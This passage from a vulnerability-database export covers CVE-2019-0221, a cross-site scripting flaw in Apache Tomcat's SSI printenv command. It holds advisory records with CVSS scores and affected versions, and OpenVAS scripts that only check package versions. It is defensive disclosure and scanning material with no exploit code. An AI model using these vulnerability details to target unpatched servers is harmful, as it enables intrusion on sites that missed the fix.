"MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2023-03-07T22:37:13", "id": "RH:CVE-2019-0221", "href": "https://access.redhat.com/security/cve/cve-2019-0221", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntucve": [{"lastseen": "2023-01-27T13:56:14", "description": "The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to\n8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and\nis, therefore, vulnerable to XSS. SSI is disabled by default. The printenv\ncommand is intended for debugging and is unlikely to be present in a\nproduction website.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | from upstream advisory: \"The printenv command is intended for\" \"debugging and is unlikely to be present in a production\" \"website.\"\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-05-28T00:00:00", "type": "ubuntucve", "title": "CVE-2019-0221", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2019-05-28T00:00:00", "id": "UB:CVE-2019-0221", "href": "https://ubuntu.com/security/CVE-2019-0221", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-02-09T14:22:00", "description": "The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2019-05-28T22:29:00", "type": "cve", "title": "CVE-2019-0221", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221"], "modified": "2021-07-13T17:15:00", "cpe": ["cpe:/a:apache:tomcat:7.0.93", "cpe:/a:apache:tomcat:9.0.0", "cpe:/a:apache:tomcat:8.5.39", "cpe:/a:apache:tomcat:9.0.17"], "id": "CVE-2019-0221", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-0221", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:apache:tomcat:9.0.0:m6:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.17:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m12:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m10:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m7:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m9:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m27:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m18:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m8:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m5:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m20:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m26:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:7.0.93:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m23:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m19:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m1:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m17:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:8.5.39:*:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m13:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m2:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m14:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m11:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m22:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m24:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m15:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m3:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m4:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m21:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m16:*:*:*:*:*:*", "cpe:2.3:a:apache:tomcat:9.0.0:m25:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-02-20T18:49:31", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2019-1885)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0221"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220191885", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191885", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1885\");\n script_version(\"2020-02-18T11:13:49+0000\");\n script_cve_id(\"CVE-2019-0221\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 11:13:49 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:25:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2019-1885)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP5\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1885\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1885\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'tomcat' package(s) announced via the EulerOS-SA-2019-1885 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.(CVE-2019-0221)\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Huawei EulerOS V2.0SP5.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP5\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~7.0.76~8.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", rpm:\"tomcat-admin-webapps~7.0.76~8.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-el-2.2-api\", rpm:\"tomcat-el-2.2-api~7.0.76~8.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-jsp-2.2-api\", rpm:\"tomcat-jsp-2.2-api~7.0.76~8.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-lib\", rpm:\"tomcat-lib~7.0.76~8.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-servlet-3.0-api\", rpm:\"tomcat-servlet-3.0-api~7.0.76~8.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-webapps\", rpm:\"tomcat-webapps~7.0.76~8.h5.eulerosv2r7\", rls:\"EULEROS-2.0SP5\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-06-05T01:41:05", "description": "Apache Tomcat is prone to a cross-site scripting vulnerability.", "cvss3": {}, "published": "2019-06-03T00:00:00", "type": "openvas", "title": "Apache Tomcat XSS Vulnerability - May19 (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0221"], "modified": "2019-06-03T00:00:00", "id": "OPENVAS:1361412562310142479", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142479", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142479\");\n script_version(\"2019-06-03T03:11:58+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-03 03:11:58 +0000 (Mon, 03 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-03 03:05:45 +0000 (Mon, 03 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2019-0221\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Tomcat XSS Vulnerability - May19 (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\", \"Host/runs_unixoide\");\n\n script_tag(name:\"summary\", value:\"Apache Tomcat is prone to a cross-site scripting vulnerability.\");\n\n script_tag(name:\"insight\", value:\"The SSI printenv command in Apache Tomcat echoes user provided data without\n escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for\n debugging and is unlikely to be present in a production website.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat versions 7.0.0 to 7.0.93, 8.5.0 to 8.5.39 and 9.0.0.M1 to\n 9.0.17.\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.0.94, 8.5.40, 9.0.18 or later.\");\n\n script_xref(name:\"URL\", value:\"https://seclists.org/fulldisclosure/2019/May/50\");\n script_xref(name:\"URL\", value:\"https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (isnull(port = get_app_port(cpe: CPE)))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0.0\", test_version2: \"7.0.93\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.0.94\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5.0\", test_version2: \"8.5.39\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.40\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif ((revcomp(a: version, b: \"9.0.0.M1\") >= 0) && (revcomp(a: version, b: \"9.0.17\") <= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.0.18\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-06-05T01:41:06", "description": "Apache Tomcat is prone to a cross-site scripting vulnerability.", "cvss3": {}, "published": "2019-06-03T00:00:00", "type": "openvas", "title": "Apache Tomcat XSS Vulnerability - May19 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0221"], "modified": "2019-06-03T00:00:00", "id": "OPENVAS:1361412562310142480", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142480", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142480\");\n script_version(\"2019-06-03T03:11:58+0000\");\n script_tag(name:\"last_modification\", value:\"2019-06-03 03:11:58 +0000 (Mon, 03 Jun 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-03 03:11:16 +0000 (Mon, 03 Jun 2019)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n\n script_cve_id(\"CVE-2019-0221\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Tomcat XSS Vulnerability - May19 (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\", \"Host/runs_windows\");\n\n script_tag(name:\"summary\", value:\"Apache Tomcat is prone to a cross-site scripting vulnerability.\");\n\n script_tag(name:\"insight\", value:\"The SSI printenv command in Apache Tomcat echoes user provided data without\n escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for\n debugging and is unlikely to be present in a production website.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat versions 7.0.0 to 7.0.93, 8.5.0 to 8.5.39 and 9.0.0.M1 to\n 9.0.17.\");\n\n script_tag(name:\"solution\", value:\"Update to version 7.0.94, 8.5.40, 9.0.18 or later.\");\n\n script_xref(name:\"URL\", value:\"https://seclists.org/fulldisclosure/2019/May/50\");\n script_xref(name:\"URL\", value:\"https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"revisions-lib.inc\");\ninclude(\"version_func.inc\");\n\nif (isnull(port = get_app_port(cpe: CPE)))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos['version'];\npath = infos['location'];\n\nif (version_in_range(version: version, test_version: \"7.0.0\", test_version2: \"7.0.93\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"7.0.94\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_in_range(version: version, test_version: \"8.5.0\", test_version2: \"8.5.39\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"8.5.40\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif ((revcomp(a: version, b: \"9.0.0.M1\") >= 0) && (revcomp(a: version, b: \"9.0.17\") <= 0)) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"9.0.18\", install_path: path);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-05T17:38:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2019-06-01T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for tomcat7 (DLA-1810-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0221"], "modified": "2020-03-04T00:00:00", "id": "OPENVAS:1361412562310891810", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891810", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891810\");\n script_version(\"2020-03-04T09:29:37+0000\");\n script_cve_id(\"CVE-2019-0221\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-03-04 09:29:37 +0000 (Wed, 04 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-06-01 09:22:33 +0000 (Sat, 01 Jun 2019)\");\n script_name(\"Debian LTS: Security Advisory for tomcat7 (DLA-1810-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00044.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1810-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'tomcat7'\n package(s) announced via the DLA-1810-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Nightwatch Cybersecurity Research team identified an XSS vulnerability\nin tomcat7. The SSI printenv command echoes user provided data without\nescaping. SSI is disabled by default. The printenv command is intended\nfor debugging and is unlikely to be present in a production website.\");\n\n script_tag(name:\"affected\", value:\"'tomcat7' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', this problem has been fixed in version\n7.0.56-3+really7.0.94-1.\n\nWe recommend that you upgrade your tomcat7 packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.0-java\", ver:\"7.0.56-3+really7.0.94-1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libservlet3.0-java-doc\", ver:\"7.0.56-3+really7.0.94-1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libtomcat7-java\", ver:\"7.0.56-3+really7.0.94-1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat7\", ver:\"7.0.56-3+really7.0.94-1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat7-admin\", ver:\"7.0.56-3+really7.0.94-1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat7-common\", ver:\"7.0.56-3+really7.0.94-1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat7-docs\", ver:\"7.0.56-3+really7.0.94-1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat7-examples\", ver:\"7.0.56-3+really7.0.94-1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"tomcat7-user\", ver:\"7.0.56-3+really7.0.94-1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-02-20T18:46:14", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2019-1819)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-0221"], "modified": "2020-02-18T00:00:00", "id": "OPENVAS:1361412562311220191819", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191819", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1819\");\n script_version(\"2020-02-18T11:13:49+0000\");\n script_cve_id(\"CVE-2019-0221\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-02-18 11:13:49 +0000 (Tue, 18 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 12:23:49 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for tomcat (EulerOS-SA-2019-1819)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP8\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1819\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1819\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'tomcat' package(s) announced via the EulerOS-SA-2019-1819 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.(CVE-2019-0221)\");\n\n script_tag(name:\"affected\", value:\"'tomcat' package(s) on Huawei EulerOS V2.0SP8.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP8\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat\", rpm:\"tomcat~9.0.10~1.h3.eulerosv2r8\", rls:\"EULEROS-2.0SP8\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat-admin-webapps\", 